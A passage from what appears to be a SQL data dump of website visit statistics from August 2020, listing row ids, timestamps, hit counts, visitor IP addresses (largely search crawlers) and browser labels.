hrome'),(533253,1597838252,2,2,0,0,'66.249.70.78','chrome'),(533254,1597838871,1,1,0,0,'66.249.64.60','chrome'),(533255,1597838945,2,2,0,0,'66.249.64.58','chrome'),(533256,1597839062,1,1,0,0,'5.255.253.183','other'),(533257,1597839110,1,1,0,0,'5.45.207.92','other'),(533258,1597839115,81,81,0,0,'173.231.59.209','other'),(533259,1597839700,3,3,0,0,'66.249.70.80','chrome'),(533260,1597839741,1,1,0,0,'8.29.198.27','other'),(533261,1597839863,8,8,0,0,'109.108.71.11','other'),(533262,1597839887,1,1,0,0,'66.249.70.76','chrome'),(533263,1597840018,33,33,0,0,'173.231.59.209','other'),(533264,1597840124,1,1,0,0,'54.36.149.30','other'),(533265,1597840170,1,1,0,0,'5.45.207.174','other'),(533266,1597840261,1,1,0,0,'91.196.177.147','chrome'),(533267,1597840277,1,1,0,0,'178.154.200.112','other'),(533268,1597840923,76,76,0,0,'173.231.59.209','other'),(533269,1597841430,1,1,0,0,'91.196.178.72','chrome'),(533270,1597841805,1,1,0,0,'5.45.207.174','other'),(533271,1597842097,1,1,0,0,'5.45.207.134','other'),(533272,1597842224,1,1,0,0,'5.255.253.180','other'),(533273,1597842316,1,1,0,0,'66.249.64.58','chrome'),(533274,1597842669,1,1,0,0,'66.249.70.76','chrome'),(533275,1597843036,1,1,0,0,'91.196.178.84','chrome'),(533276,1597843123,1,1,0,0,'66.249.70.78','chrome'),(533277,1597843156,1,1,0,0,'37.73.21.228','chrome'),(533278,1597843400,1,1,0,0,'91.196.178.72','chrome'),(533279,1597843604,1,1,0,0,'5.255.253.183','other'),(533280,1597843621,1,1,0,0,'5.255.253.136','other'),(533281,1597844290,3,3,0,0,'94.45.128.92','chrome'),(533282,1597844716,1,1,0,0,'5.45.207.92','other'),(533283,1597844953,1,1,0,0,'95.134.171.211','chrome'),(533284,1597846295,1,1,0,0,'5.45.207.174','other'),(533285,1597846576,1,1,0,0,'157.55.39.113','other'),(533286,1597847680,2,2,0,0,'5.45.207.92','other'),(533287,1597847813,1,1,0,0,'66.249.64.60','chrome'),(533288,1597847814,1,1,0,0,'5.255.253.75','other'),(533289,1597848802,1,1,0,0,'66.249.70.76','chrome'),(533290,1597849000,2,2,0,0,'5.45.207.92','other'),(533291,1597849050,2,2,0,0,'66.249.70.80','chrome'),(533292,1597849104,1,1,0,0,'66.249.64.60','chrome'),(533293,1597849500,1,1,0,0,'5.255.253.130','other'),(533294,1597849962,1,1,0,0,'5.255.253.151','other'),(533295,1597850413,2,2,0,0,'66.249.70.76','chrome'),(533296,1597850568,1,1,0,0,'8.29.198.26','other'),(533297,1597850640,1,1,0,0,'173.231.59.209','other'),(533298,1597850691,1,1,0,0,'66.249.70.78','chrome'),(533299,1597851213,3,3,0,0,'66.249.70.80','chrome'),(533300,1597851237,8,8,0,0,'109.108.71.11','other'),(533301,1597851306,2,2,0,0,'5.255.253.183','other'),(533302,1597851441,2,2,0,0,'66.249.70.76','chrome'),(533303,1597851860,3,3,0,0,'66.249.70.78','chrome'),(533304,1597852371,3,3,0,0,'66.249.70.76','chrome'),(533305,1597852428,8,8,0,0,'109.108.71.11','other'),(533306,1597852650,2,2,0,0,'66.249.70.80','chrome'),(533307,1597852658,1,1,0,0,'5.45.207.92','other'),(533308,1597853300,2,2,0,0,'66.249.64.58','chrome'),(533309,1597853451,1,1,0,0,'5.45.207.174','other'),(533310,1597853549,1,1,0,0,'66.249.70.76','chrome'),(533311,1597853620,8,8,0,0,'109.108.71.11','other'),(533312,1597853794,4,4,0,0,'66.249.70.78','chrome'),(533313,1597853883,1,1,0,0,'5.255.253.151','other'),(533314,1597854559,1,1,0,0,'5.45.207.127','other'),(533315,1597854786,8,8,0,0,'109.108.71.11','other'),(533316,1597854822,4,4,0,0,'66.249.70.78','chrome'),(533317,1597855232,1,1,0,0,'66.249.70.80','chrome'),(533318,1597855331,1,1,0,0,'5.45.207.92','other'),(533319,1597855799,1,1,0,0,'5.45.207.174','other'),(533320,1597855880,1,1,0,0,'207.46.13.241','other'),(533321,1597855970,8,8,0,0,'109.108.71.11','other'),(533322,1597856127,3,3,0,0,'66.249.70.76','chrome'),(533323,1597856747,1,1,0,0,'66.249.70.78','chrome'),(533324,1597856918,1,1,0,0,'5.255.253.69','other'),(533325,1597857029,3,3,0,0,'66.249.70.80','chrome'),(533326,1597857078,1,1,0,0,'2.47.39.210','other'),(533327,1597857081,8,8,0,0,'109.108.71.11','other'),(533328,1597857154,2,2,0,0,'66.249.64.58','chrome'),(533329,1597857703,3,3,0,0,'66.249.70.78','chrome'),(533330,1597858013,2,2,0,0,'66.249.70.76','chrome'),(533331,1597858218,8,8,0,0,'109.108.71.11','other'),(533332,1597858360,1,1,0,0,'66.249.70.80','chrome'),(533333,1597858770,1,1,0,0,'5.255.253.69','other'),(533334,1597858843,3,3,0,0,'66.249.70.78','chrome'),(533335,1597859219,3,3,0,0,'66.249.64.58','chrome'),(533336,1597859305,1,1,0,0,'66.249.64.60','chrome'),(533337,1597859364,8,8,0,0,'109.108.71.11','other'),(533338,1597859472,2,2,0,0,'66.249.70.76','chrome'),(533339,1597859505,1,1,0,0,'194.107.178.226','chrome'),(533340,1597859596,1,1,0,0,'130.211.192.160','other'),(533341,1597859732,3,3,0,0,'173.231.59.209','other'),(533342,1597859802,2,2,0,0,'66.249.70.78','chrome'),(533343,1597859834,1,1,0,0,'141.8.142.73','other'),(533344,1597859851,2,2,0,0,'5.45.207.174','other'),(533345,1597859959,2,2,0,0,'66.249.70.80','chrome'),(533346,1597860282,1,1,0,0,'91.196.178.33','chrome'),(533347,1597860480,2,2,0,0,'66.249.70.76','chrome'),(533348,1597860515,8,8,0,0,'109.108.71.11','other'),(533349,1597860800,1,1,0,0,'5.255.253.136','other'),(533350,1597860932,1,1,0,0,'173.231.59.209','other'),(533351,1597861336,1,1,0,0,'173.252.111.13','other'),(533352,1597861393,1,1,0,0,'8.29.198.27','other'),(533353,1597861450,1,1,0,0,'66.249.64.60','chrome'),(533354,1597861468,1,1,0,0,'66.249.70.80','chrome'),(533355,1597861475,1,1,0,0,'66.249.70.78','chrome'),(533356,1597861654,8,8,0,0,'109.108.71.11','other'),(533357,1597861898,2,2,0,0,'5.45.207.174','other'),(533358,1597862012,1,1,0,0,'66.249.70.76','chrome'),(533359,1597862187,1,1,0,0,'209.17.96.170','other'),(533360,1597862287,1,1,0,0,'5.255.253.105','other'),(533361,1597862385,1,1,0,0,'37.73.134.111','chrome'),(533362,1597862577,1,1,0,0,'66.249.70.78','chrome'),(533363,1597862788,8,8,0,0,'109.108.71.11','other'),(533364,1597862792,1,1,0,0,'66.249.64.60','chrome'),(533365,1597862957,1,1,0,0,'5.45.207.174','other'),(533366,1597862965,1,1,0,0,'66.249.70.76','chrome'),(533367,1597863071,1,1,0,0,'17.58.99.84','other'),(533368,1597863267,2,2,0,0,'66.249.70.80','chrome'),(533369,1597863388,2,2,0,0,'66.249.64.58','chrome'),(533370,1597863909,8,8,0,0,'109.108.71.11','other'),(533371,1597864444,2,2,0,0,'66.249.70.80','chrome'),(533372,1597864613,1,1,0,0,'5.45.207.174','other'),(533373,1597864909,2,2,0,0,'66.249.64.60','chrome'),(533374,1597865000,8,8,0,0,'109.108.71.11','other'),(533375,1597865179,1,1,0,0,'66.249.64.56','chrome'),(533376,1597866157,8,8,0,0,'109.108.71.11','other'),(533377,1597866580,2,2,0,0,'66.249.70.78','chrome'),(533378,1597866729,3,3,0,0,'66.249.70.80','chrome'),(533379,1597867275,8,8,0,0,'109.108.71.11','other'),(533380,1597867462,2,2,0,0,'66.249.70.76','chrome'),(533381,1597868075,1,1,0,0,'5.45.207.174','other'),(533382,1597868113,1,1,0,0,'217.160.65.177','other'),(533383,1597868226,1,1,0,0,'66.249.64.58','chrome'),(533384,1597868373,8,8,0,0,'109.108.71.11','other'),(533385,1597868671,1,1,0,0,'185.168.251.188','other'),(533386,1597868734,1,1,0,0,'185.189.114.126','chrome'),(533387,1597868863,1,1,0,0,'66.249.70.76','chrome'),(533388,1597869518,8,8,0,0,'109.108.71.11','other'),(533389,1597870122,1,1,0,0,'66.249.64.58','chrome'),(533390,1597870248,1,1,0,0,'5.255.253.136','other'),(533391,1597870555,2,2,0,0,'66.249.70.78','chrome'),(533392,1597870649,8,8,0,0,'109.108.71.11','other'),(533393,1597870953,3,3,0,0,'66.249.70.76','chrome'),(533394,1597871792,8,8,0,0,'109.108.71.11','other'),(533395,1597872151,1,1,0,0,'207.46.13.241','other'),(533396,1597872219,1,1,0,0,'8.29.198.27','other'),(533397,1597872222,1,1,0,0,'66.249.70.80','chrome'),(533398,1597872325,2,2,0,0,'66.249.70.78','chrome'),(533399,1597872391,1,1,0,0,'5.45.207.75','other'),(533400,1597872438,1,1,0,0,'5.255.253.126','other'),(533401,1597872553,2,2,0,0,'66.249.70.76','chrome'),(533402,1597872926,8,8,0,0,'109.108.71.11','other'),(533403,1597873018,1,1,0,0,'173.231.59.209','other'),(533404,1597873473,1,1,0,0,'66.249.64.60','chrome'),(533405,1597873758,1,1,0,0,'66.249.70.80','chrome'),(533406,1597873871,3,3,0,0,'66.249.70.76','chrome'),(533407,1597873999,2,2,0,0,'66.249.70.78','chrome'),(533408,1597874075,8,8,0,0,'109.108.71.11','other'),(533409,1597874263,1,1,0,0,'207.46.13.241','other'),(533410,1597874393,1,1,0,0,'5.45.207.92','other'),(533411,1597874520,1,1,0,0,'173.231.59.209','other'),(533412,1597874835,1,1,0,0,'66.249.64.58','chrome'),(533413,1597875244,8,8,0,0,'109.108.71.11','other'),(533414,1597875365,2,2,0,0,'5.45.207.174','other'),(533415,1597875475,1,1,0,0,'138.246.253.15','chrome'),(533416,1597875478,1,1,0,0,'66.249.70.78','chrome'),(533417,1597876344,1,1,0,0,'5.45.207.92','other'),(533418,1597876454,8,8,0,0,'109.108.71.11','other'),(533419,1597876602,1,1,0,0,'66.249.70.78','chrome'),(533420,1597876671,1,1,0,0,'23.96.58.44','other'),(533421,1597877197,1,1,0,0,'5.255.253.114','other'),(533422,1597877270,1,1,0,0,'66.249.70.80','chrome'),(533423,1597877551,8,8,0,0,'109.108.71.11','other'),(533424,1597877824,1,1,0,0,'5.45.207.70','other'),(533425,1597878111,1,1,0,0,'5.255.253.111','other'),(533426,1597878300,1,1,0,0,'66.249.70.80','chrome'),(533427,1597878662,8,8,0,0,'109.108.71.11','other'),(533428,1597878737,1,1,0,0,'5.45.207.92','other'),(533429,1597879354,1,1,0,0,'66.249.70.80','chrome'),(533430,1597879552,2,2,0,0,'66.249.70.78','chrome'),(533431,1597879723,2,2,0,0,'66.249.64.60','chrome'),(533432,1597880112,8,8,0,0,'109.108.71.11','other'),(533433,1597880414,1,1,0,0,'66.249.70.80','chrome'),(533434,1597880502,1,1,0,0,'207.46.13.28','other'),(533435,1597880949,1,1,0,0,'66.249.64.56','chrome'),(533436,1597881190,8,8,0,0,'109.108.71.11','other'),(533437,1597881205,1,1,0,0,'66.249.70.78','chrome'),(533438,1597881241,1,1,0,0,'5.255.253.136','other'),(533439,1597881307,1,1,0,0,'62.205.134.182','other'),(533440,1597881521,2,2,0,0,'5.45.207.174','other'),(533441,1597881798,1,1,0,0,'17.58.99.7','other'),(533442,1597881882,1,1,0,0,'5.255.253.183','other'),(533443,1597882066,1,1,0,0,'66.249.64.58','chrome'),(533444,1597882169,1,1,0,0,'66.249.64.60','chrome'),(533445,1597882276,8,8,0,0,'109.108.71.11','other'),(533446,1597882367,1,1,0,0,'134.19.179.235','chrome'),(533447,1597882578,4,4,0,0,'66.249.70.78','chrome'),(533448,1597882883,2,2,0,0,'66.249.70.80','chrome'),(533449,1597883043,1,1,0,0,'8.29.198.26','other'),(533450,1597883125,2,2,0,0,'66.249.70.76','chrome'),(533451,1597883197,72,72,0,0,'173.231.59.209','other'),(533452,1597883327,1,1,0,0,'66.249.64.58','chrome'),(533453,1597883432,8,8,0,0,'109.108.71.11','other'),(533454,1597883672,2,2,0,0,'66.249.70.78','chrome'),(533455,1597883932,1,1,0,0,'207.46.13.252','other'),(533456,1597884033,1,1,0,0,'66.249.70.80','chrome'),(533457,1597884099,10,10,0,0,'173.231.59.209','other'),(533458,1597884117,1,1,0,0,'5.45.207.174','other'),(533459,1597884513,1,1,0,0,'213.180.203.75','other'),(533460,1597884537,8,8,0,0,'109.108.71.11','other'),(533461,1597884597,3,3,0,0,'66.249.70.76','chrome'),(533462,1597885186,1,1,0,0,'5.45.207.174','other'),(533463,1597885564,2,2,0,0,'5.45.207.92','other'),(533464,1597885635,2,1,1,0,'66.249.70.76',''),(533465,1597885661,8,8,0,0,'109.108.71.11','other'),(533466,1597885958,3,3,0,0,'66.249.70.78','chrome'),(533467,1597886275,1,1,0,0,'66.249.64.56','chrome'),(533468,1597886283,1,1,0,0,'5.255.253.183','other'),(533469,1597886377,1,1,0,0,'157.55.39.173','other'),(533470,1597886721,8,8,0,0,'109.108.71.11','other'),(533471,1597887153,2,2,0,0,'66.249.70.78','chrome'),(533472,1597887281,1,1,0,0,'66.249.70.80','chrome'),(533473,1597887335,1,1,0,0,'31.13.127.14','other'),(533474,1597887526,1,1,0,0,'66.249.70.76','chrome'),(533475,1597887633,3,3,0,0,'5.45.207.92','other'),(533476,1597887826,8,8,0,0,'109.108.71.11','other'),(533477,1597888375,1,1,0,0,'5.255.253.144','other'),(533478,1597888485,1,1,0,0,'66.249.70.76','chrome'),(533479,1597888553,1,1,0,0,'66.249.64.58','chrome'),(533480,1597888603,1,1,0,0,'5.45.207.174','other'),(533481,1597889078,8,8,0,0,'109.108.71.11','other'),(533482,1597889127,101,101,0,0,'173.231.59.209','other'),(533483,1597889222,3,3,0,0,'66.249.70.78','chrome'),(533484,1597889369,1,1,0,0,'66.249.73.46','chrome'),(533485,1597889609,2,2,0,0,'66.249.70.80','chrome'),(533486,1597889807,1,1,0,0,'5.45.207.174','other'),(533487,1597890116,100,100,0,0,'173.231.59.209','other'),(533488,1597890176,8,8,0,0,'109.108.71.11','other'),(533489,1597890328,2,2,0,0,'66.249.70.76','chrome'),(533490,1597890423,3,3,0,0,'66.249.70.78','chrome'),(533491,1597891053,4,4,0,0,'66.249.70.80','chrome'),(533492,1597891276,8,8,0,0,'109.108.71.11','other'),(533493,1597891282,2,2,0,0,'5.45.207.174','other'),(533494,1597891510,100,100,0,0,'173.231.59.209','other'),(533495,1597891835,1,1,0,0,'5.255.253.88','other'),(533496,1597891935,1,1,0,0,'66.249.64.58','chrome'),(533497,1597891941,2,2,0,0,'66.249.70.78','chrome'),(533498,1597892115,1,1,0,0,'17.58.99.84','other'),(533499,1597892368,8,8,0,0,'109.108.71.11','other'),(533500,1597892616,74,74,0,0,'173.231.59.209','other'),(533501,1597893214,2,2,0,0,'66.249.64.56','chrome'),(533502,1597893470,2,2,0,0,'66.249.70.76','chrome'),(533503,1597893502,8,8,0,0,'109.108.71.11','other'),(533504,1597893520,1,1,0,0,'5.45.207.174','other'),(533505,1597893644,1,1,0,0,'66.249.70.78','chrome'),(533506,1597893871,1,1,0,0,'8.29.198.27','other'),(533507,1597893875,82,82,0,0,'173.231.59.209','other'),(533508,1597894113,1,1,0,0,'66.249.70.80','chrome'),(533509,1597894157,7,7,0,0,'217.160.65.177','other'),(533510,1597894593,2,2,0,0,'66.249.70.76','chrome'),(533511,1597894638,8,8,0,0,'109.108.71.11','other'),(533512,1597894899,89,89,0,0,'173.231.59.209','other'),(533513,1597894988,1,1,0,0,'66.249.64.60','chrome'),(533514,1597895038,1,1,0,0,'66.249.70.78','chrome'),(533515,1597895087,1,1,0,0,'66.249.70.80','chrome'),(533516,1597895321,1,1,0,0,'5.255.253.88','other'),(533517,1597895752,8,8,0,0,'109.108.71.11','other'),(533518,1597895757,3,3,0,0,'66.249.70.76','chrome'),(533519,1597895964,100,100,0,0,'173.231.59.209','other'),(533520,1597896152,1,1,0,0,'5.255.253.126','other'),(533521,1597896396,1,1,0,0,'207.46.13.62','other'),(533522,1597896540,1,1,0,0,'5.255.253.105','other'),(533523,1597896895,1,1,0,0,'141.8.142.82','other'),(533524,1597896898,8,8,0,0,'109.108.71.11','other'),(533525,1597896973,100,100,0,0,'173.231.59.209','other'),(533526,1597897885,1,1,0,0,'66.249.70.78','chrome'),(533527,1597897933,100,100,0,0,'173.231.59.209','other'),(533528,1597898133,1,1,0,0,'207.46.13.62','other'),(533529,1597898324,1,1,0,0,'138.246.253.15','chrome'),(533530,1597898349,1,1,0,0,'5.45.207.174','other'),(533531,1597898502,1,1,0,0,'5.255.253.183','other'),(533532,1597898625,1,1,0,0,'131.220.6.152','chrome'),(533533,1597898724,1,1,0,0,'66.249.70.76','chrome'),(533534,1597899033,100,100,0,0,'173.231.59.209','other'),(533535,1597899254,1,1,0,0,'66.249.64.60','chrome'),(533536,1597899511,1,1,0,0,'62.205.134.182','other'),(533537,1597899841,1,1,0,0,'5.45.207.174','other'),(533538,1597899870,8,8,0,0,'109.108.71.11','other'),(533539,1597900005,100,100,0,0,'173.231.59.209','other'),(533540,1597900254,1,1,0,0,'66.249.64.56','chrome'),(533541,1597900423,1,1,0,0,'66.249.70.76','chrome'),(533542,1597900959,8,8,0,0,'109.108.71.11','other'),(533543,1597901144,1,1,0,0,'5.45.207.135','other'),(533544,1597901149,100,100,0,0,'173.231.59.209','other'),(533545,1597901270,2,2,0,0,'66.249.70.78','chrome'),(533546,1597901317,1,1,0,0,'66.249.70.80','chrome'),(533547,1597901357,2,2,0,0,'91.196.178.169','chrome'),(533548,1597901425,1,1,0,0,'5.45.207.174','other'),(533549,1597901803,1,1,0,0,'178.154.200.2','other'),(533550,1597902081,8,8,0,0,'109.108.71.11','other'),(533551,1597902097,55,55,0,0,'173.231.59.209','other'),(533552,1597903246,8,8,0,0,'109.108.71.11','other'),(533553,1597903307,100,100,0,0,'173.231.59.209','other'),(533554,1597904294,99,99,0,0,'173.231.59.209','other'),(533555,1597904472,8,8,0,0,'109.108.71.11','other'),(533556,1597904696,1,1,0,0,'8.29.198.25','other'),(533557,1597904921,1,1,0,0,'193.53.252.47','chrome'),(533558,1597905285,20,20,0,0,'173.231.59.209','other'),(533559,1597905652,8,8,0,0,'109.108.71.11','other'),(533560,1597906119,1,1,0,0,'46.211.24.214','chrome'),(533561,1597906602,1,1,0,0,'5.255.253.88','other'),(533562,1597906772,2,2,0,0,'91.196.178.74','chrome'),(533563,1597906776,1,1,0,0,'91.234.27.138','chrome'),(533564,1597906828,8,8,0,0,'109.108.71.11','other'),(533565,1597908008,8,8,0,0,'109.108.71.11','other'),(533566,1597909176,8,8,0,0,'109.108.71.11','other'),(533567,1597909263,1,1,0,0,'66.249.70.80','chrome'),(533568,1597909277,1,1,0,0,'157.55.39.111','other'),(533569,1597909303,1,1,0,0,'66.249.64.56','chrome'),(533570,1597910234,2,2,0,0,'66.249.70.78','chrome'),(533571,1597910364,8,8,0,0,'109.108.71.11','other'),(533572,1597910764,2,2,0,0,'66.249.64.60','chrome'),(533573,1597911429,1,1,0,0,'66.249.70.76','chrome'),(533574,1597911594,8,8,0,0,'109.108.71.11','other'),(533575,1597911738,1,1,0,0,'66.249.64.60','chrome'),(533576,1597911862,3,3,0,0,'66.249.70.80','chrome'),(533577,1597912356,3,3,0,0,'66.249.70.76','chrome'),(533578,1597912758,8,8,0,0,'109.108.71.11','other'),(533579,1597913121,1,1,0,0,'198.23.247.188','chrome'),(533580,1597913200,1,1,0,0,'95.152.48.20','chrome'),(533581,1597913293,1,1,0,0,'77.75.150.134','chrome'),(533582,1597913376,2,2,0,0,'66.249.70.78','chrome'),(533583,1597913770,1,1,0,0,'91.196.178.169','chrome'),(533584,1597913958,8,8,0,0,'109.108.71.11','other'),(533585,1597914181,1,1,0,0,'66.249.64.60','chrome'),(533586,1597914782,2,2,0,0,'66.249.70.78','chrome'),(533587,1597914853,1,1,0,0,'66.249.70.80','chrome'),(533588,1597914903,1,1,0,0,'66.249.64.56','chrome'),(533589,1597915014,1,1,0,0,'157.55.39.242','other'),(533590,1597915126,8,8,0,0,'109.108.71.11','other'),(533591,1597915521,1,1,0,0,'8.29.198.25','other'),(533592,1597915799,1,1,0,0,'91.196.178.72','chrome'),(533593,1597916112,1,1,0,0,'66.249.70.80','chrome'),(533594,1597916364,1,1,0,0,'66.249.70.78','chrome'),(533595,1597917042,1,1,0,0,'66.249.70.76','chrome'),(533596,1597917160,1,1,0,0,'91.196.178.72','chrome'),(533597,1597917313,2,2,0,0,'66.249.70.78','chrome'),(533598,1597917403,1,1,0,0,'207.46.13.28','other'),(533599,1597917625,8,8,0,0,'109.108.71.11','other'),(533600,1597917831,1,1,0,0,'66.249.70.80','chrome'),(533601,1597917833,1,1,0,0,'157.55.39.251','other'),(533602,1597918087,1,1,0,0,'31.13.127.8','other'),(533603,1597918789,8,8,0,0,'109.108.71.11','other'),(533604,1597918897,2,2,0,0,'66.249.70.76','chrome'),(533605,1597919247,1,1,0,0,'66.249.64.60','chrome'),(533606,1597919311,1,0,1,0,'66.249.70.78',''),(533607,1597919319,1,1,0,0,'3.14.10.144','chrome'),(533608,1597919795,1,1,0,0,'66.249.70.78','chrome'),(533609,1597920005,8,8,0,0,'109.108.71.11','other'),(533610,1597920008,1,1,0,0,'66.249.70.80','chrome'),(533611,1597920549,1,1,0,0,'195.128.139.203','chrome'),(533612,1597920687,6,6,0,0,'66.249.70.76','chrome'),(533613,1597921206,2,2,0,0,'66.249.70.78','chrome'),(533614,1597921269,8,8,0,0,'109.108.71.11','other'),(533615,1597921377,1,1,0,0,'109.74.154.72','chrome'),(533616,1597921557,1,1,0,0,'66.249.70.80','chrome'),(533617,1597922576,3,3,0,0,'66.249.70.80','chrome'),(533618,1597922589,8,8,0,0,'109.108.71.11','other'),(533619,1597923114,2,2,0,0,'66.249.70.78','chrome'),(533620,1597923140,1,1,0,0,'66.249.70.76','chrome'),(533621,1597923972,1,1,0,0,'157.55.39.12','other'),(533622,1597924069,8,8,0,0,'109.108.71.11','other'),(533623,1597924096,1,1,0,0,'91.196.177.97','chrome'),(533624,1597924487,3,3,0,0,'66.249.70.80','chrome'),(533625,1597924497,2,2,0,0,'66.249.70.78','chrome'),(533626,1597924530,1,1,0,0,'66.249.64.58','chrome'),(533627,1597924937,2,2,0,0,'91.196.178.79','chrome'),(533628,1597925211,2,2,0,0,'66.249.70.76','chrome'),(533629,1597925236,8,8,0,0,'109.108.71.11','other'),(533630,1597925497,2,2,0,0,'157.55.39.251','other'),(533631,1597925980,1,1,0,0,'91.196.178.79','chrome'),(533632,1597926102,1,1,0,0,'66.249.70.78','chrome'),(533633,1597926351,1,1,0,0,'8.29.198.26','other'),(533634,1597926365,1,1,0,0,'66.249.70.80','chrome'),(533635,1597926378,1,1,0,0,'94.45.128.92','chrome'),(533636,1597926409,8,8,0,0,'109.108.71.11','other'),(533637,1597927551,4,4,0,0,'66.249.70.80','chrome'),(533638,1597927607,1,1,0,0,'66.249.70.76','chrome'),(533639,1597927623,8,8,0,0,'109.108.71.11','other'),(533640,1597927850,2,2,0,0,'66.249.70.78','chrome'),(533641,1597928043,1,1,0,0,'91.196.178.72','chrome'),(533642,1597928674,1,1,0,0,'157.55.39.251','other'),(533643,1597928729,2,2,0,0,'66.249.64.60','chrome'),(533644,1597928795,8,8,0,0,'109.108.71.11','other'),(533645,1597929020,1,1,0,0,'66.249.70.78','chrome'),(533646,1597929038,1,1,0,0,'66.249.64.56','chrome'),(533647,1597929855,1,1,0,0,'69.171.251.1','other'),(533648,1597929938,8,8,0,0,'109.108.71.11','other'),(533649,1597930367,1,1,0,0,'46.211.51.221','chrome'),(533650,1597930856,3,3,0,0,'66.249.70.76','chrome'),(533651,1597930890,1,1,0,0,'37.73.161.162','chrome'),(533652,1597931081,8,8,0,0,'109.108.71.11','other'),(533653,1597931101,2,2,0,0,'66.249.70.80','chrome'),(533654,1597931313,1,1,0,0,'66.249.64.58','chrome'),(533655,1597931449,3,2,1,0,'66.249.70.78',''),(533656,1597931520,2,2,0,0,'116.202.203.237','other'),(533657,1597931522,1,1,0,0,'116.202.203.237','chrome'),(533658,1597931633,1,1,0,0,'51.77.52.160','chrome'),(533659,1597931947,1,1,0,0,'66.249.70.76','chrome'),(533660,1597932150,1,1,0,0,'91.196.178.140','firefox'),(533661,1597932244,8,8,0,0,'109.108.71.11','other'),(533662,1597932535,1,1,0,0,'157.55.39.251','other'),(533663,1597932963,1,1,0,0,'66.249.70.78','chrome'),(533664,1597933082,2,2,0,0,'66.249.70.76','chrome'),(533665,1597933310,1,1,0,0,'217.160.65.177','chrome'),(533666,1597933391,1,1,0,0,'66.249.64.60','chrome'),(533667,1597933407,8,8,0,0,'109.108.71.11','other'),(533668,1597933432,2,2,0,0,'66.249.70.80','chrome'),(533669,1597934107,1,1,0,0,'157.55.39.173','other'),(533670,1597934223,3,3,0,0,'66.249.70.76','chrome'),(533671,1597934237,1,1,0,0,'66.249.70.78','chrome'),(533672,1597934540,8,8,0,0,'109.108.71.11','other'),(533673,1597934591,1,1,0,0,'66.249.70.80','chrome'),(533674,1597935154,3,3,0,0,'66.249.70.78','chrome'),(533675,1597935591,1,1,0,0,'66.249.70.76','chrome'),(533676,1597935685,8,8,0,0,'109.108.71.11','other'),(533677,1597936002,1,1,0,0,'207.46.13.252','other'),(533678,1597936179,3,3,0,0,'66.249.70.78','chrome'),(533679,1597936228,1,1,0,0,'207.46.13.68','other'),(533680,1597936320,1,1,0,0,'192.71.23.211','other'),(533681,1597936774,3,3,0,0,'66.249.70.80','chrome'),(533682,1597936804,8,8,0,0,'109.108.71.11','other'),(533683,1597936815,6,6,0,0,'66.249.70.76','chrome'),(533684,1597936821,2,2,0,0,'66.249.64.60','chrome'),(533685,1597937178,1,1,0,0,'8.29.198.27','other'),(533686,1597937295,1,1,0,0,'157.55.39.251','other'),(533687,1597937449,1,1,0,0,'66.249.70.78','chrome'),(533688,1597937563,1,1,0,0,'157.55.39.249','other'),(533689,1597937870,1,1,0,0,'207.46.13.68','other'),(533690,1597937965,8,8,0,0,'109.108.71.11','other'),(533691,1597938460,2,2,0,0,'66.249.70.78','chrome'),(533692,1597938519,1,1,0,0,'66.249.70.80','chrome'),(533693,1597938635,1,1,0,0,'66.249.64.60','chrome'),(533694,1597939128,8,8,0,0,'109.108.71.11','other'),(533695,1597939383,3,3,0,0,'66.249.70.78','chrome'),(533696,1597939500,3,3,0,0,'66.249.70.76','chrome'),(533697,1597939525,1,1,0,0,'66.249.64.58','chrome'),(533698,1597939850,2,2,0,0,'66.249.70.80','chrome'),(533699,1597940279,8,8,0,0,'109.108.71.11','other'),(533700,1597940896,2,2,0,0,'66.249.70.78','chrome'),(533701,1597940975,1,1,0,0,'66.249.64.58','chrome'),(533702,1597941416,5,5,0,0,'66.249.70.76','chrome'),(533703,1597941443,8,8,0,0,'109.108.71.11','other'),(533704,1597941521,3,3,0,0,'66.249.70.80','chrome'),(533705,1597941761,2,2,0,0,'66.249.64.56','chrome'),(533706,1597941784,1,1,0,0,'17.58.99.7','other'),(533707,1597941915,3,3,0,0,'66.249.70.78','chrome'),(533708,1597942590,8,8,0,0,'109.108.71.11','other'),(533709,1597942915,2,2,0,0,'66.249.70.76','chrome'),(533710,1597942978,1,1,0,0,'66.249.64.56','chrome'),(533711,1597943050,2,2,0,0,'157.55.39.251','other'),(533712,1597943748,3,3,0,0,'66.249.70.78','chrome'),(533713,1597943806,8,8,0,0,'109.108.71.11','other'),(533714,1597943994,1,1,0,0,'66.249.64.58','chrome'),(533715,1597944043,2,2,0,0,'66.249.64.60','chrome'),(533716,1597944071,2,2,0,0,'17.58.99.7','other'),(533717,1597944123,2,2,0,0,'66.249.70.80','chrome'),(533718,1597944234,1,1,0,0,'66.249.70.76','chrome'),(533719,1597944279,1,1,0,0,'207.46.13.62','other'),(533720,1597944936,3,3,0,0,'66.249.70.78','chrome'),(533721,1597944988,8,8,0,0,'109.108.71.11','other'),(533722,1597945484,1,1,0,0,'66.249.64.56','chrome'),(533723,1597945555,1,1,0,0,'157.55.39.113','other'),(533724,1597945664,1,1,0,0,'5.255.253.136','other'),(533725,1597945733,1,1,0,0,'207.46.13.252','other'),(533726,1597946070,4,4,0,0,'66.249.70.80','chrome'),(533727,1597946084,4,4,0,0,'66.249.70.76','chrome'),(533728,1597946161,8,8,0,0,'109.108.71.11','other'),(533729,1597946217,1,1,0,0,'17.58.99.7','other'),(533730,1597946330,2,2,0,0,'66.249.64.60','chrome'),(533731,1597946500,1,1,0,0,'66.249.64.56','chrome'),(533732,1597947356,8,8,0,0,'109.108.71.11','other'),(533733,1597947479,3,3,0,0,'66.249.70.76','chrome'),(533734,1597947616,1,1,0,0,'157.55.39.113','other'),(533735,1597948004,1,1,0,0,'8.29.198.26','other'),(533736,1597948145,1,1,0,0,'66.249.64.60','chrome'),(533737,1597948194,3,3,0,0,'66.249.70.80','chrome'),(533738,1597948259,5,5,0,0,'66.249.70.78','chrome'),(533739,1597948561,8,8,0,0,'109.108.71.11','other'),(533740,1597948828,1,1,0,0,'157.55.39.120','other'),(533741,1597949240,2,2,0,0,'66.249.70.80','chrome'),(533742,1597949385,1,1,0,0,'66.249.64.58','chrome'),(533743,1597949697,4,4,0,0,'66.249.70.76','chrome'),(533744,1597949702,8,8,0,0,'109.108.71.11','other'),(533745,1597949812,1,1,0,0,'37.73.126.239','chrome'),(533746,1597950080,2,2,0,0,'66.249.70.78','chrome'),(533747,1597950148,3,3,0,0,'66.249.70.80','chrome'),(533748,1597950338,1,1,0,0,'66.249.64.60','chrome'),(533749,1597950922,8,8,0,0,'109.108.71.11','other'),(533750,1597951223,1,1,0,0,'88.155.162.27','chrome'),(533751,1597951395,2,2,0,0,'66.249.70.80','chrome'),(533752,1597951404,4,4,0,0,'66.249